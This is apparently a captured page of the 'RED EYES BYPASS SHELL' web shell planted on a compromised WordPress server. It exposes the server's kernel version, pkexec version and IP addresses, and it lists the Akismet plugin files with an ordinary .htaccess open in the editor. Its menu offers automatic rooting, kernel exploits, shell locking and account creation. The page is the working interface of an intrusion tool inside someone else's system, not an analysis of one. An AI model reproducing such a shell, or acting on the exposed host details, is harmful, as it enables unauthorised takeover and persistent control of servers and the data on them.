Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
techno /
wp-content /
plugins /
akismet /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
_inc
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.htaccess
654
B
-rwxr-xr-x
LICENSE.txt
17.67
KB
-rwxr-xr-x
akismet.php
2.52
KB
-rwxr-xr-x
changelog.txt
21.45
KB
-rwxr-xr-x
class.akismet-admin.php
51.65
KB
-rwxr-xr-x
class.akismet-cli.php
4.55
KB
-rwxr-xr-x
class.akismet-rest-api.php
10.87
KB
-rwxr-xr-x
class.akismet-widget.php
3.04
KB
-rwxr-xr-x
class.akismet.php
66.55
KB
-rwxr-xr-x
index.php
26
B
-rwxr-xr-x
readme.txt
3.63
KB
-rwxr-xr-x
wrapper.php
6.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Only allow direct access to specific Web-available files. # Apache 2.2 <IfModule !mod_authz_core.c> Order Deny,Allow Deny from all </IfModule> # Apache 2.4 <IfModule mod_authz_core.c> Require all denied </IfModule> # Akismet CSS and JS <FilesMatch "^(form\.js|akismet\.js|akismet-frontend\.js|akismet\.css)$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch> # Akismet images <FilesMatch "^logo-(a|full)-2x\.png$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch>
Close